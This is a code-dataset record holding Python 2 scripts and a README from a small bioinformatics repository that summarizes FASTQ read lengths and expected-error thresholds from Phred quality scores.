data.iteritems():\n\t\tdata[k][\"L\"] = np.array(data[k][\"L\"], dtype=int)\n\t\tdata[k][\"percent\"] = np.array(data[k][\"percent\"], dtype=float)\n\n\t# threshold\n\toutput = {}\n\toutput = threshold(data)\n\tsummarize(output, args)\n\n\nif __name__ == \"__main__\":\n\tmain()\n" }, { "alpha_fraction": 0.6340740919113159, "alphanum_fraction": 0.6414814591407776, "avg_line_length": 18.622093200683594, "blob_id": 
"d9d41d177c2a3e5779e35696e4d9534615615779", "content_id": "8a97dbbf8610f280a80e1c4327201ee5827c513f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3375, "license_type": "permissive", "max_line_length": 64, "num_lines": 172, "path": "/emax_stats.py", "repo_name": "jeffreywolf/expectedError", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\"\"\"\nE statistics summary\n\"\"\"\nfrom Bio import SeqIO\nimport re\nimport os\nimport glob\nimport argparse\nimport numpy as np\nimport ConfigParser\n\n\ndef getArgs():\n\tparser = argparse.ArgumentParser(\n\t\tdescription = \"E statistics summary.\"\n\t)\n\tparser.add_argument(\n\t\t\"-i\",\n\t\t\"--input\",\n\t\ttype = str,\n\t\trequired = True,\n\t\thelp = \"Input file fastq\"\n\t)\n\n\tparser.add_argument(\n\t\t\"-c\",\n\t\t\"--config\",\n\t\ttype = str,\n\t\trequired = True,\n\t\thelp = \"Configuration file.\"\n\t)\n\n\tparser.add_argument(\n\t\t\"-v\",\n\t\t\"--verbose\",\n\t\taction = 'store_true',\n\t\thelp = \"Print status updates while executing.\"\n\t)\n\n\tparser.add_argument(\n\t\t\"-o\",\n\t\t\"--output\",\n\t\ttype = str,\n\t\trequired = True,\n\t\thelp = \"Output file\"\n\t)\n\treturn parser.parse_args()\n\ndef getConfigs(configFile):\n\ttry:\n\t\tconfigDict = {}\n\t\tconfig = ConfigParser.ConfigParser()\n\t\tconfig.read(configFile)\n\t\tParams= dict(config.items(\"Params\"))\n\t\tprint Params\n\t\temaxes = [float(emax) for emax in Params[\"emaxes\"].split(\",\")]\n\t\t#print emaxes\n\t\t#emaxes.sort().reverse()\n\t\treturn emaxes\n\texcept Exception as e:\n\t\tprint \"Problem parsing config file. Check config file.\"\n\t\traise e\n\ndef E_calc(S):\n\t\"\"\"Calculate E for a sequence based on phred quality scores.\n\t\"\"\"\n\tQs = S.letter_annotations[\"phred_quality\"]\n\tQs = np.array(Qs, dtype=np.float)\n\tPi = np.power(10.,-Qs/10.)\n\t# Note this will correctly return 0 for an empty array.\n\tE = np.sum(Pi) \n\treturn E\n\ndef E_test(E, Emax):\n\t\"\"\"Test if E is less than Emax.\n\t\"\"\"\n\treturn E <= Emax\n\ndef trim(S, L):\n\t\"\"\"Trim a sequence to a specified length.\n\t\"\"\"\n\treturn S[:L]\n\ndef L_filter(S, L):\n\t\"\"\"Test if a trim sequence S matches a length threshold L.\n\t\"\"\"\n\tif len(S.seq) == L:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef E_filter(S, Emax):\n\t\"\"\"Test if a E for a sequence S is less than Emax.\n\t\"\"\"\n\t#print S, Emax\n\t#print S.letter_annotations[\"phred_quality\"]\n\tE = E_calc(S)\n\tif E_test(E, Emax):\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef summarize(data, total, args):\n\t\"\"\"Write the cumulative distributions for each emax to a file.\n\t\"\"\"\n\tcount = 0\n\theader = \"Emax,L,N,percent\\n\"\n\twith open(args.output, \"w\") as f:\n\t\tf.write(header)\n\t\tfor key, value in data.iteritems():\n\t\t\tfor k, v in value.iteritems():\n\t\t\t\trow = \"{},{},{},{}\\n\".format(\n\t\t\t\t\tkey,\n\t\t\t\t\tk,\n\t\t\t\t\tv,\n\t\t\t\t\tv/float(total)*100.0\n\t\t\t\t)\n\t\t\t\tif args.verbose:\n\t\t\t\t\tprint row,\n\t\t\t\tf.write(row)\n\t\t\t\tcount += 1\n\treturn count\n\ndef main():\n\targs = getArgs()\n\tif args.verbose:\n\t\tprint args\n\temaxes = getConfigs(args.config)\n\tif args.verbose:\n\t\tprint \"Emaxes: {}\".format(emaxes)\n\n\t# Get maximum sequence length\n\tlength = 0\n\tlength_max = 0\n\ttotal_sequences = 0\n\tfor seq in SeqIO.parse(args.input, \"fastq\"):\n\t\ttotal_sequences += 1\n\t\tlength = len(seq.seq)\n\t\tif length > length_max:\n\t\t\tlength_max = length\n\tif 
args.verbose:\n\t\tprint \"Maximum length is {} bp.\".format(length_max)\n\t# Vector of lengths\t\n\tlengths = range(length_max+1)\n\tdel length\n\tdel length_max\n\n\t# Make Data Structure\n\tdata = {}\n\tfor E in emaxes:\n\t\tdata[E]={}\n\t\tfor length in lengths:\n\t\t\tdata[E][length]=0\n\n\tcount = 0\n\tfor seq in SeqIO.parse(args.input, \"fastq\"):\n\t\tcount += 1\n\t\tfor E in emaxes:\n\t\t\tfor length in lengths:\n\t\t\t\tS = trim(seq, length)\n\t\t\t\tif L_filter(S, length) and E_filter(S, E):\n\t\t\t\t\tdata[E][length]+=1\n\t\tif args.verbose:\n\t\t\tif count % 1000 == 0:\n\t\t\t\tprint \"At sequence number {}.\".format(count)\n\tsummarize(data, total_sequences, args)\n\n\n\nif __name__ == \"__main__\":\n\tmain()\n" }, { "alpha_fraction": 0.7118380069732666, "alphanum_fraction": 0.7379283308982849, "avg_line_length": 34.66666793823242, "blob_id": "ef91bc0f3f60c9f00b84b025cc5ef25218a65021", "content_id": "fff98b0b6353358d4143654d5f3d3f5af1373916", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2568, "license_type": "permissive", "max_line_length": 266, "num_lines": 72, "path": "/README.md", "repo_name": "jeffreywolf/expectedError", "src_encoding": "UTF-8", "text": "README \n======\n\nGeneral\n-------\nScripts to quantify properties of the expected error [1-3] and read length distribution for sequencing data in fastq format.\n\n### Expected Error\nUse `emax_stats.py` to summarize the proportion of reads that when trimmed to a maximum length L meet that length threshold and also have expected error (E) less than a specified Emax (maxee) threshold. Multiple Emax thresholds can be set in the file emax_stats.cfg.\n\nUse `emax_threshold.py` to summarize output from `emax_stats.py` resulting in a new summary with the trim length at an Emax threshold for obtaining 25%, 50%, and 75% of the reads.\n\n### Read Length Distribution\n`length_stats.py`\nSummarize the cumulative length distribution of sequences. \n\n\nInput\n-------------\n`emax_stats.py`\n\n1. A configuration file with a series of Emax values. See example emax_stats.cfg file.\n2. A sequence data file in fastq format.\n\n\n`emax_threshold.py`\n* Output from emax_stats.py\n\n`length_stats.py`\n* A sequence data file in fastq format.\n\n\nOutput\n-------------\n`emax_stats.py`\n* A csv file summarizing the cumulative distribution for percent of total reads passing specified Emax thresholds for all lengths spanning from zero to the maximum read length in the sequence data file.\n\n`emax_threshold.py`\n* A csv file containing the trim lengths that give 25%, 50%, or 75% of the total number of reads when applying a given Emax threshold.\n\n`length_stats.py`\n* A csv file containing the cumulative distribution of read lengths for a given input file.\n\n\nNon-standard library dependencies\n--------------\nBiopython, numpy\n\n\nExamples\n--------\nCall any of the programs with the -h flag for a brief list of commandline arguments. Note that `emax_stats.py` requires a configuration file. \n\nIf running on Unix-like system make sure the files are executable.\n`chmod u+x emax_stats.py`\n`chmod u+x length_stats.py`\n`chmod u+x emax_threshold.py`\n\nThen you can run the programs like so.\n\n`emax_stats.py -i input.fastq -c emax_stats.cfg -o emax_stats.csv -v`\n`length_stats.py -i input.fastq -o length_stats.csv -v`\n`emax_threshold.py -i emax_stats.csv -o emax_thresholds.csv -v`\n\n\nReferences\n----------\n[1] Edgar, R.C. 
(2013) UPARSE: Highly accurate OTU sequences from microbial amplicon reads. Nature Methods 10(10):996-998. <a href=\"http://dx.doi.org/10.1038/nmeth.2604\">dx.doi.org/10.1038/nmeth.2604</a>\n\n[2] Edgar, R.C. \"Expected Errors\". <http://drive5.com/usearch/manual/expected_errors.html> accessed Jan. 18, 2015\n\n[3] Edgar, R.C. \"Average Q score\". <http://drive5.com/usearch/manual/avgq.html> accessed Jan. 18, 2015\n" }, { "alpha_fraction": 0.6171597838401794, "alphanum_fraction": 0.6295858025550842, "avg_line_length": 17.172042846679688, "blob_id": "b19286b2be83c071fd09bd91b778f0ba4750b39d", "content_id": "29ff128715255e210a6b30a9713b1d76deb0a94c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1690, "license_type": "permissive", "max_line_length": 67, "num_lines": 93, "path": "/length_stats.py", "repo_name": "jeffreywolf/expectedError", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\"\"\"\nE statistics summary\n\"\"\"\nfrom Bio import SeqIO\nimport re\nimport os\nimport glob\nimport argparse\nimport numpy as np\n\n\ndef getArgs():\n\tparser = argparse.ArgumentParser(\n\t\tdescription = \"E statistics summary.\"\n\t)\n\tparser.add_argument(\n\t\t\"-i\",\n\t\t\"--input\",\n\t\ttype = str,\n\t\trequired = True,\n\t\thelp = \"Input file fastq\"\n\t)\n\n\tparser.add_argument(\n\t\t\"-v\",\n\t\t\"--verbose\",\n\t\taction = 'store_true',\n\t\thelp = \"Print status updates while executing.\"\n\t)\n\n\tparser.add_argument(\n\t\t\"-o\",\n\t\t\"--output\",\n\t\ttype = str,\n\t\trequired = True,\n\t\thelp = \"Output file\"\n\t)\n\treturn parser.parse_args()\n\ndef summarize(data, filename):\n\t\"\"\"Write cumulative distribution of lengths to a file.\n\t\"\"\"\n\tcount = 0\n\theader = \"L,N,percent,CumulativeCount,CDF\\n\"\n\twith open(filename, \"w\") as f:\n\t\tf.write(header)\n\t\tfor i, elem in enumerate(data):\n\t\t\trow = \"{},{},{},{},{}\\n\".format(\n\t\t\t\ti,\n\t\t\t\telem,\n\t\t\t\telem/float(sum(data))*100.0,\n\t\t\t\tsum(data[i:]),\n\t\t\t\tsum(data[i:])/float(sum(data))*100\n\t\t\t)\n\t\t\tprint row,\n\t\t\tf.write(row)\n\t\t\tcount += 1\n\treturn count\n\ndef testCount(tally1, tally2):\n\tassert tally1 == tally2, \"Error: Sequence tally counts not equal.\"\n\ndef main():\n\targs = getArgs()\n\tif args.verbose:\n\t\tprint args\n\n\t# Maximum length\n\tm = 0\n\ttotal = 0\n\tfor seq in SeqIO.parse(args.input, \"fastq\"):\n\t\ttotal += 1\n\t\tN = len(seq.seq)\n\t\tif N > m:\n\t\t\tm = N\n\tif total == 0:\n\t\tprint \"Check sequence file. No sequences read.\"\n\t\treturn -1\n\t# Length Distribution\n\t# m + 1 to include possibility of zeros.\n\tdata = np.zeros(m+1, dtype=int)\n\tfor seq in SeqIO.parse(args.input, \"fastq\"):\n\t\tN = len(seq.seq)\n\t\tdata[N]+=1\n\n\t#testCount(total, sum(data))\n\tsummarize(data, args.output)\n\n\n\nif __name__ == \"__main__\":\n\tmain()\n" } ]
4
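For the `expectedError` scripts above, the quantity being thresholded is the per-read expected error E = Σ 10^(-Qi/10) over the Phred quality scores of a (possibly trimmed) read, as computed by `E_calc` in `emax_stats.py`. A minimal stand-alone sketch using Biopython, as those scripts do; the function names, the file name `input.fastq`, and the example Emax and trim values are assumptions for illustration only.

```python
import numpy as np
from Bio import SeqIO

def expected_error(record, trim_length=None):
    """Expected number of errors in a read: sum of 10**(-Q/10) over its Phred scores."""
    if trim_length is not None:
        record = record[:trim_length]  # trim before scoring, as emax_stats.py does
    quals = np.asarray(record.letter_annotations["phred_quality"], dtype=float)
    return float(np.sum(np.power(10.0, -quals / 10.0)))

def passes_maxee(record, maxee, trim_length=None):
    """True if the (trimmed) read meets the Emax filter used by the scripts above."""
    return expected_error(record, trim_length) <= maxee

# Example: count reads that still pass Emax = 1.0 after trimming to 250 bp.
# kept = sum(passes_maxee(r, 1.0, 250) for r in SeqIO.parse("input.fastq", "fastq"))
```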
Damon-Jay/BO
https://github.com/Damon-Jay/BO
55fa9154097a2f35e1475faf5fda67ccf5a834f6
e6f6577fdc5d56dfb0540655f78cdf04d0ffa69d
6e153c4a2aa6552c59d0d0b89a4aacca0be33663
refs/heads/main
2023-01-05T04:44:10.525320
2020-10-29T23:03:16
2020-10-29T23:03:16
301,200,787
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6344085931777954, "alphanum_fraction": 0.6344085931777954, "avg_line_length": 22.5, "blob_id": "44e0acb2c7bb4e14f0cd23f3d1867bced337c982", "content_id": "0d742af79c47595576c25dd5c37c53897b6ceda0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 93, "license_type": "no_license", "max_line_length": 33, "num_lines": 4, "path": "/python opdrachten/HelloYouPython.py", "repo_name": "Damon-Jay/BO", "src_encoding": "UTF-8", "text": "print(\"Hello You, ik ben Damon Jellema\")\nprint(\"Wie ben jij?\")\nnaam = input()\nprint(\"Hello \" + naam)" }, { "alpha_fraction": 0.6336144208908081, "alphanum_fraction": 0.6681205630302429, "avg_line_length": 30.650306701660156, "blob_id": "b4be126e8d46fdf3bb22f3e610f482b1561f098c", "content_id": "45420830bcbbcbc3248623ca65c9c15a51cb9822", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10320, "license_type": "no_license", "max_line_length": 302, "num_lines": 326, "path": "/python opdrachten/Keuzeverhaal.py", "repo_name": "Damon-Jay/BO", "src_encoding": "UTF-8", "text": "import time\nimport os\n\nos.system(\"cls\")\n\nintro = 1;\nvraag1 = 0;\nantwoord1 = 0;\nvraag2 = 0;\nantwoord2 = 0;\nvraag3 = 0;\nantwoord3 = 0;\nvraag4 = 0;\nantwoord4 = 0;\nvraag5 = 0;\nantwoord5 = 0;\nvraag6 = 0;\nantwoord6 = 0;\nvraag7 = 0;\nantwoord7 = 0;\nvraag8 = 0;\nantwoord8 = 0;\nvraag9 = 0;\nantwoord9 = 0;\nvraag10 = 0;\nantwoord10 = 0;\nvraag11 = 0;\nantwoord11 = 0;\nvraag12 = 0;\nantwoord12 = 0;\nvraag13 = 0;\nantwoord13 = 0;\nvraag14 = 0;\nantwoord14 = 0;\nvraag15 = 0;\nantwoord15 = 0;\nvraag16 = 0;\nantwoord16 = 0;\nvraag17 = 0;\nantwoord17 = 0;\nvraag18 = 0;\nantwoord18 = 0;\nvraag19 = 0;\nantwoord19 = 0;\nvraag20 = 0;\nantwoord20 = 0;\nvraag21 = 0;\nantwoord21 = 0;\nvraag22 = 0;\nantwoord22 = 0;\nvraag23 = 0;\nantwoord23 = 0;\nvraag24 = 0;\nantwoord24 = 0;\nvraag25 = 0;\nantwoord25 = 0;\n\nwhile intro == 1:\n print(\"Je woont in een arm dorpje samen met je Oma, Vader, Moeder en je twee Zussen.\" + '\\n' + \"Op een dag krijgen jullie het nieuws dat er extremisten naar jullie dorp komen.\" + '\\n' + \"het is heel onveilig\")\n vraag1 = 1;\n intro = 0;\n break\n\nwhile vraag1 == 1:\n print(\"Ga je vluchten of niet\")\n antwoord1 = input(\"A - Wel of B - Niet : \").upper()\n break\n\nwhile antwoord1 == 'A':\n vraag2 = 1; \n break\n\nwhile antwoord1 == 'B':\n vraag3 = 1;\n break\n\nwhile vraag3 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jij en je familie kiezen ervoor om te blijven in jullie dorp. de volgende dag horen jullie schoten. jullie kijken naar buiten en ziet rook in de verte.\" + \"jullie kiezen ervoor om te vluchten. Jullie pakken spullen om te overleven.\")\n antwoord3 = input(\"A - jullie gaat op jullie ezels met spullen er vandoor of B - jullie gaat met een kar met jullie spullen weg : \").upper()\n break\n \nwhile antwoord3 == 'B': \n print('\\n'\"Jullie vluchte met de kar maar ze zagen jullie dus jullie werden neergeschoten\") \n break\n\nwhile antwoord3 == 'A':\n vraag2 = 1;\n break\n \nwhile vraag2 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie vertrekken met jullie ezels richting het noord westen. ze spotten jullie gelukig niet. 
jullie zijn al 5 uur onderweg.\")\n antwoord2 = input(\"A - Jullie gaan gewoon door of B - jullie gaan even stoppen om te eten en drinken of B : \").upper()\n break\n\nwhile antwoord2 == 'B': \n vraag5 = 1; \n break\n\nwhile antwoord2 == 'A':\n vraag6 = 1;\n break\n\n\nwhile vraag6 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie stoppen niet en gaan gewoon door. na een tijdje zakken jullie ezels in omdat ze honger en dorst hebben.\")\n antwoord6 = input(\"A - jullie gaan stoppen, eten en drinken, de ezels drinken te geven maar geen eten of B - jullie gaan stoppen, eten en drinken, en de ezels krijgen eten en drinken : \").upper()\n break\n\nwhile antwoord6 == 'B': \n vraag5 = 1; \n break\n\nwhile antwoord6 == 'A':\n vraag7 = 1;\n break\n\nwhile vraag7 == 1:\n os.system(\"cls\")\n print('\\n' + \"het is heel laat jullie zijn moe.\")\n antwoord7 = input(\"A - jullie gaan slapen of B - jullie gaan gewoon door : \").upper()\n break\n\nwhile antwoord7 == 'A': \n print('\\n'\"Jullie gingen slapen. later op de avond werden jullie gespot door de extemisten en werden jullie vermoord\") \n break\n\nwhile antwoord7 == 'B':\n vraag9 = 1;\n break\n\nwhile vraag5 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie hebben gegeten en gedronken. Ook hebben jullie de ezels eten en drinkengegeven. jullie zien twee paden een gaat naar links en een gaat naar rechts.\")\n antwoord5 = input(\"A - jullie gaan naar links of B - jullie gaan naar rechts : \").upper()\n break\n\nwhile antwoord5 == 'B': \n vraag8 = 1; \n break\n\nwhile antwoord5 == 'A':\n vraag9 = 1;\n break\n\nwhile vraag8 == 1:\n os.system(\"cls\")\n print('\\n' + \"jullie gingen naar rechts. het pad kwam uit in een dichtgegroeid bos.\")\n antwoord8 = input(\"A - gaan jullie terug en nemen het andere pad of B - gaan jullie er doorheen : \").upper()\n break\n\nwhile antwoord8 == 'B': \n vraag12 = 1; \n break\n\nwhile antwoord8 == 'A':\n vraag9 = 1;\n break \n\nwhile vraag9 == 1:\n os.system(\"cls\")\n print('\\n' + \"Het pad wat jullie namen leed naar de stad Istanboel. de ezels zijn zo uitgeput dat ze niet meer verder kunnen. dus jullie besloten om ze te vermoorden en het vlees voor later mee te nemen. in istanboel kwamen jullie een man tegen. die wilt jullie helpen door een onderdak te geven.\")\n antwoord9 = input(\"A -vertrouw je hem niet en ga weer verder of B - vertrouw je hem wel : \").upper()\n break\n\nwhile antwoord9 == 'A': \n vraag12 = 1; \n break\n\nwhile antwoord9 == 'B':\n vraag15 = 1;\n break\n\nwhile vraag12 == 1:\n os.system(\"cls\")\n print('\\n' + \"jullie gaan istanboel in jullie zien een paar smokkelaars. ook zie je man van daarstraks nog. naar wie ga je.\")\n antwoord12 = input(\"A - ga je naar de smokkelaars of B - of je gaat toch met de man mee : \").upper()\n break\n\nwhile antwoord12 == 'B': \n vraag13 = 1; \n break\n\nwhile antwoord12 == 'A':\n vraag14 = 1;\n break\n\nwhile vraag13 == 1:\n os.system(\"cls\")\n print('\\n' + \"de man zegt tegen de familie over dat die smokkelaars hun kan vervoeren. maar dat ze vandaag vertrekken. de man zij ook dat ze bij hem kunnen blijven voor een tijdje\")\n antwoord13 = input(\"A - ga je naar de smokkelaars of B - of blijft bij de man : \").upper()\n break\n\nwhile antwoord13 == 'B': \n vraag15 = 1; \n break\n\nwhile antwoord13 == 'A':\n vraag14 = 1;\n break\nwhile vraag14 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie zijn weg gegaan bij de boerderij. jullie zien de smokelaars. dus jullie lopen naar hun toe en vraagt of jullie mee mogen naar een ander land. 
de smokkelaars zeggen dat jullie mogen kiezen.\")\n antwoord14 = input(\"A - Via de britse smokkelaars of B - via de Bulgaarse smokkelaars : \").upper()\n break\n\nwhile antwoord14 == 'B': \n vraag19 = 1; \n break\n\nwhile antwoord14 == 'A':\n print('\\n'\"Jullie gingen met de britse smokkelaars mee naar Oekraïne. Daar zijn jullie afgedropt in een dorpje waar de mensen jullie verder gingen helpen om jullie leven weer te herbouwen\")\n break\n\nwhile vraag15 == 1:\n os.system(\"cls\")\n print('\\n' + \"hij brengt jullie naar zijn stal en hij geeft jullie eten en drinken. hij gaat samen met jullie eten.\")\n antwoord15 = input(\"A - vertellen jullie NIET de reden waarom jullie zijn gevlucht en vertrekken na het eten of B - vertellen jullie WEL de reden waarom jullie zijn gevlucht : \").upper()\n break\n\nwhile antwoord15 == 'B': \n vraag16 = 1; \n break\n\nwhile antwoord15 == 'A':\n vraag14 = 1;\n break\n\nwhile vraag16 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie gaan slapen. Jij wordt wakker door gepraat. je hele familie ligt te slapen. Je hoord de man wat brabbelen. Je weet niet zeker wat je heb gehoord. wat doe je\")\n antwoord16 = input(\"A - Je vertelt tegen je familie dat we weg moeten gaan of B - je gaat weer door slapen : \").upper()\n break\n\nwhile antwoord16 == 'B': \n print('\\n'\"De man was aan de telefoon met een van de extremisten. de volgende dag werden jullie neergeschoten door de extremisten die jullie door de man heeft gevonden\")\n break\n\nwhile antwoord16 == 'A':\n vraag18 = 1;\n break\n\nwhile vraag18 == 1:\n os.system(\"cls\")\n print('\\n' + \"Je bent met je familie weg gegaan van de boerderij. maar waar gaan jullie naartoe\")\n antwoord18 = input(\"A - Gaan jullie de stad in of B - Het bos in : \").upper()\n break\n\nwhile antwoord18 == 'B': \n print('\\n'\"Je bent het bos in gegaan alleen de man kon dat zien. jullie zijn achtervolgd door de man en jullie zijn neergeschoten in het bos.\") \n break\n\nwhile antwoord18 == 'A':\n vraag19 = 1;\n break\n\nwhile vraag19 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie hebben besloten om met de bulgaarse smokkelaars mee te gaan. De smokkelaars vragen hoe ze vervoerd willen worden\")\n antwoord19 = input(\"A - Met de boot of B - Met een busje : \").upper()\n break\n\nwhile antwoord19 == 'B': \n vraag20 = 1;\n break\n\nwhile antwoord19 == 'A':\n vraag22 = 1;\n break\nwhile vraag19 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie hebben besloten om met de bulgaarse smokkelaars mee te gaan. De smokkelaars vragen hoe ze vervoerd willen worden\")\n antwoord19 = input(\"A - Met een busje naar de kust of B - Met een busje door landen heen : \").upper()\n break\n\nwhile antwoord19 == 'B': \n vraag20 = 1;\n break\n\nwhile antwoord19 == 'A':\n vraag22 = 1;\n break\n\nwhile vraag22 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie hebben besloten om naar de kust te gaan. De smokkelaars moeten verschillende kanten op\")\n antwoord22 = input(\"A - ga je met de boot of B - verde met het busje\").upper() \n break\n\nwhile antwoord22 == 'B': \n vraag20 = 1;\n break\n\nwhile antwoord22 == 'A':\n vraag23 = 1;\n break\n\nwhile vraag20 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie hebben besloten om verder te gaan met het busje.Jullie rijden met het busje naar italie. 
vanaf daar moesten jullie naar andere smokkelaars gaan die twee verschillede kanten op gaan.\")\n antwoord20 = input(\"A - ga je met de een auto naar Nederland of B - Ga je met de boot\").upper()\n break\n\nwhile antwoord20 == 'B': \n vraag23= 1;\n break\n\nwhile antwoord20 == 'A':\n print('\\n' + \"Jullie hebben besloten om naar Nederland te gaan. Jullie reden Naar nederland. toen jullie daar aankwamen werden jullie opgevangen. jullie vroegen een asielvergunning aan. jullie haalden de inburgeringstest en mochten daarom in Nederland blijven.\")\n break\n \nwhile vraag23 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie hebben besloten om naar de kust te gaan en dan met de boot vervoerd te worden. alleen de smokkelaars moeten naar twee verschillende landen. met welke ga je mee\")\n antwoord23 = input(\"A - ga je naar Nederland of B - je gaat naar Tunesië: \").upper()\n break\n\nwhile antwoord23 == 'B': \n print('\\n' + \"Jullie hebben besloten om naar Tunesië te gaan. Jullie vaarde daar nartoe alleen de de golfen waren te hoog en jullie zijn daardoor verdronken\")\n break\n\nwhile antwoord23 == 'A':\n print('\\n' + \"Jullie hebben besloten om naar Nederland te gaan. Jullie vaarde succesvol Naar nederland. toen jullie daar aankwamen werden jullie opgevangen. jullie vroegen een asielvergunning aan. jullie haalden de inburgeringstest en mochten daarom in Nederland blijven.\")\n break" }, { "alpha_fraction": 0.5835492014884949, "alphanum_fraction": 0.5939119458198547, "avg_line_length": 29.215686798095703, "blob_id": "e1543eb3d259069ed98ac073e3f17815393b260c", "content_id": "2c36693f4873c897ec00b40efa95cea928b48fc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1544, "license_type": "no_license", "max_line_length": 91, "num_lines": 51, "path": "/python opdrachten/ditbenik.py", "repo_name": "Damon-Jay/BO", "src_encoding": "UTF-8", "text": "antwoord = \"\"\n\n\nprint(\"Hello You, ik ben Damon Jellema\")\nprint(\"Wie ben jij?\")\nnaam = input()\nprint('\\n')\nprint(\"Hello \" + naam)\nprint('\\n')\nprint(\"Ik ben een nieuwkomer op het mediacollege Amsterdam\")\nprint(\"Ik ga een aantal vragen stellen over mij zodat je me beter leert kennen.\")\nprint('\\n')\nprint(\"Op welke School zat ik voor het mediacollege?:\")\nprint(\"A. ClusiusCollege\")\nprint(\"B. KennemerCollege Beroepsgericht\")\nprint(\"C. De Marel\")\nantwoord = input().upper()\n\nif antwoord == 'B': \n print('\\n' + \"Goed\") \nelif antwoord == 'A': \n print('\\n' + \"Fout. Het goede antwoord is:\" + '\\n' + \"KennemerCollege Beroepsgericht\") \nelif antwoord == 'C':\n print('\\n' + \"Fout. Het goede antwoord is:\" + '\\n' + \"KennemerCollege Beroepsgericht\") \n\n\nprint('\\n' + \"Volgende vraag\" + '\\n' + \"Op welke vechtsport zit ik?:\")\nprint(\"1. Kickboxen\")\nprint(\"2. shotokan karate\")\nprint(\"3. Krav Maga\")\n\nantwoord = input()\nif antwoord == '3': \n print('\\n' + \"Goed\") \nelif antwoord == '1':\n print('\\n' + \"Fout. Het goede antwoord is:\" + '\\n' + \"Krav Maga\") \nelif antwoord == '2':\n print('\\n' + \"Fout. Het goede antwoord is:\" + '\\n' + \"Krav Maga\") \nprint('\\n' + \"Laatste vraag\" + '\\n' + \"Hoe oud ben ik?:\")\nprint(\"D. 15\")\nprint(\"E. 16\")\nprint(\"F. 18\")\n\nantwoord = input().upper()\nif antwoord == 'D': \n print('\\n' + \"Goed\") \nelif antwoord == 'E':\n print('\\n' + \"Fout. Het goede antwoord is:\" + '\\n' + \"15\") \nelif antwoord == 'F':\n print('\\n' + \"Fout. 
Het goede antwoord is:\" + '\\n' + \"15\") \nprint(\"Einde van de Quiz. Hopelijk weet je nu wat meer van mij.\") " } ]
3
witignite/Capstone-design
https://github.com/witignite/Capstone-design
db82b6b0be845c9eeb1bdda6c8120add7f79e1a0
1e4b054ae34addfb9823d51a604879704a8a0155
cae007fc9a7c2d09c33600bb9c364541102dbf85
refs/heads/master
2020-04-07T03:38:50.064327
2018-11-17T21:14:08
2018-11-17T21:14:08
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7828282713890076, "alphanum_fraction": 0.7979797720909119, "avg_line_length": 48.5, "blob_id": "254b7ccf118fb176d5a42f7e438732b74dce025c", "content_id": "88395e4e12a1c6bd9816116b411b4e1ab744231a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 198, "license_type": "no_license", "max_line_length": 100, "num_lines": 4, "path": "/README.md", "repo_name": "witignite/Capstone-design", "src_encoding": "UTF-8", "text": "# Copy from\n\n1. This file is copied/apdated from https://github.com/berkeleydeeprlcourse/homework/tree/master/hw3\n2. This file is copied/apdated from https://github.com/leeJaeDuck/dqn_learning_code\n" }, { "alpha_fraction": 0.4567258059978485, "alphanum_fraction": 0.47946035861968994, "avg_line_length": 45.12181091308594, "blob_id": "eae100725b139118d700fa1a7b1355ad067aa770", "content_id": "1db0f1e763ec83d6fe8011ecb4da7b6c1ad81d5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 56112, "license_type": "no_license", "max_line_length": 212, "num_lines": 1215, "path": "/dqn_learning_code/simulator.py", "repo_name": "witignite/Capstone-design", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport cv2\nimport numpy as np\nimport yaml, sys, time, random\nimport math\n# import rospy, roslib, rospkg\n\n# from sensor_msgs.msg import Image\n# from geometry_msgs.msg import Vector3\n# from tt_core_msgs.msg import Vector3DArray, ImagePoint\n# from cv_bridge import CvBridge, CvBridgeError\n# from sensor_msgs.msg import CompressedImage\n\n# Simulator -----------------------------------------------------------------------------------\nsimulator = {\"width\":31, \"height\":31, \"center\":15, \"resol\":2} # Will be used as input to the policy network\n# resol = # Zoom out the view\n\nmap_param = {\"width\":30, \"height\":50, \"center\":25, \"resol\":1, \"scale\":5} # Size of the map (Should be same with real one?)\n# resol = \n# scale = ???\n\ntrans_scale = int(simulator[\"resol\"]/map_param[\"resol\"]) # Zoom out the view\n\n# Settings for simulator ----------------------------------------------------------------------\nback_pixels = 4 # number of pixels behind (In simulator scale)\nback_pixels_map = back_pixels*trans_scale # (In map scale)\n\ndebug_scale = 10 # Scale up debug window for visualization\nDEBUG_SCALE_WIT = 10 # Scale up my debug window\nDEBUG_SCALE_ENV = 10\ndebug_scale_gray = 10\n\n# Robot parameters ----------------------------------------------------------------------------\n# In map scale\n#\n# COLLECT_X\n# | |\n# _______________ ___\n# | collect |\n# | region | COLLECT_Y Not finished yet\n# |_______________| ___\n# +---------------+\n# | |\n# | |\n# | |\n# | + | ---\n# | |\n# | | R_Y\n# | |\n# +---------------+ ---\n# | R_X |\n\nrot_scale = 5 # Rotation step (in degree)\ncamera_fov = 78 # In degree\nball_blind_slope = 1/np.tan(camera_fov/2*np.pi/180)\nball_blind_bias = 1 # In simulator scale\nball_blind_bias_map = 1.5 # in map scale\nx_disable_move = 4 # 